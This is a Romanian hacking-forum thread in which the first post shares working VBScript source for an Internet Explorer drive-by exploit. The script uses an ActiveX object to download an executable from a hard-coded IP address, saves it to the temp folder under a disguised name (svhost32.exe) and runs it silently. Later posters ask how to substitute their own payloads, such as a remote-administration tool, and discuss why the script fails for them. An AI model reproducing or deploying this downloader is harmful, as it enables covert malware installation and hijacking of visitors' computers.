Guest Nemessis Posted September 28, 2006 Report Share Posted September 28, 2006 Ma mir ca pana acum nu a postat nimeni sursa paginii ce infecteaza utilizatorii de yahoo messenger si ii face sa trimita reclame in toata lista. Asa ca pun eu sursa exploitului (doar IE este vulnerabil) iar daca a mai fost postata il rog pe kwerln sa stearga postul.Functioneaza si pe SP2 si trebuie doar sa intrati pe o pagina ce contine acest cod pentru a fi infectati. Folositi Firefox Link original al sursei: http://nsl-school.org<script language="VBScript"> on error resume next dl = "http://64.26.25.75/host.exe" Set df = document.createElement("object") df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" str="Microsoft.XMLHTTP" Set x = df.CreateObject(str,"") a1="Ado" a2="db." a3="Str" a4="eam" str1=a1&a2&a3&a4 str5=str1 set S = df.createobject(str5,"") S.type = 1 str6="GET" x.Open str6, dl, False x.Send fname1="svhost32.exe" set F = df.createobject("Scripting.FileSystemObject","") set tmp = F.GetSpecialFolder(2) fname1= F.BuildPath(tmp,fname1) S.open S.write x.responseBody S.savetofile fname1,2 S.close set Q = df.createobject("Shell.Application","") Q.ShellExecute fname1,"","","open",0 </script> Link to comment Share on other sites More sharing options...
Sub_Zero Posted September 28, 2006 Report Share Posted September 28, 2006 pai din cate stiu eu a mai fost postat,da parca scriptul era putin altfel Link to comment Share on other sites More sharing options...
J0K3R Posted September 28, 2006 Report Share Posted September 28, 2006 Si in loc de "http://64.26.25.75/host.exe" pot sa pun orice, nu ? (ex: http://site.com/program.exe) :@ Link to comment Share on other sites More sharing options...
bossjuan Posted September 29, 2006 Report Share Posted September 29, 2006 nu merge am incercat eu sa pun si nu merge eu am vrut sa pun un radmin la exe si nu merge Link to comment Share on other sites More sharing options...
bossjuan Posted September 29, 2006 Report Share Posted September 29, 2006 eu am pus exac host-ul meu si apoi l-am pus acolo in script si nu face nimic scritul trebuie pus presupun intr-un html? Link to comment Share on other sites More sharing options...
bossjuan Posted September 29, 2006 Report Share Posted September 29, 2006 mie scriptul imi da o eroare cand il pun pe hsot si incerc sa il acesez ceva de genuC:DOCUME~1hackLOCALS~1TEMPsvhost32.exeThe NTVDM CPU hs encontred an ilegl instruction.CS:053a IP:01d1 OP63 68 65 2f 31 Choose 'Close'to terminate hte applicationde ce imi da asa ? Link to comment Share on other sites More sharing options...
B_Real Posted September 29, 2006 Report Share Posted September 29, 2006 cel mai inervant exploit pe care l am vazut il au vreo 5 6 din lista mea si incaontinu !!! dar... le-am dat ignor ) Link to comment Share on other sites More sharing options...
bossjuan Posted September 29, 2006 Report Share Posted September 29, 2006 de ce imi d erorea aia? Link to comment Share on other sites More sharing options...
Christian Posted September 29, 2006 Report Share Posted September 29, 2006 prea tarziu .. NOD32 detecteaza linia Q.ShellExecute fname1,"","","open",0 ca HTML/TrojanDownloader.Agent.NAB trojan Link to comment Share on other sites More sharing options...
Pastilatu' Posted September 29, 2006 Report Share Posted September 29, 2006 nu downloadeaza frate troinaul... Link to comment Share on other sites More sharing options...
format c: Posted May 3, 2008 Report Share Posted May 3, 2008 interesant...am pus si eu pe un forum al astora de la myforum.ro si nu am vazut nici o schimbare:|nu a dld nimic.ceva ajutor as putea primi? Link to comment Share on other sites More sharing options...
fenesan Posted June 10, 2011 Report Share Posted June 10, 2011 Imi poate explica cineva cum se foloseste ? la mine nu merge sau poate a fost reparat bugul Link to comment Share on other sites More sharing options...
MrRip Posted June 10, 2011 Report Share Posted June 10, 2011 Te-ai uitat si tu cand a fost postat exploit-ul ? 09-28-2006, 10:13 AM !!!!!!!!!!!!!!!! Cascati dracu ochii inainte de a posta ceva ! Link to comment Share on other sites More sharing options...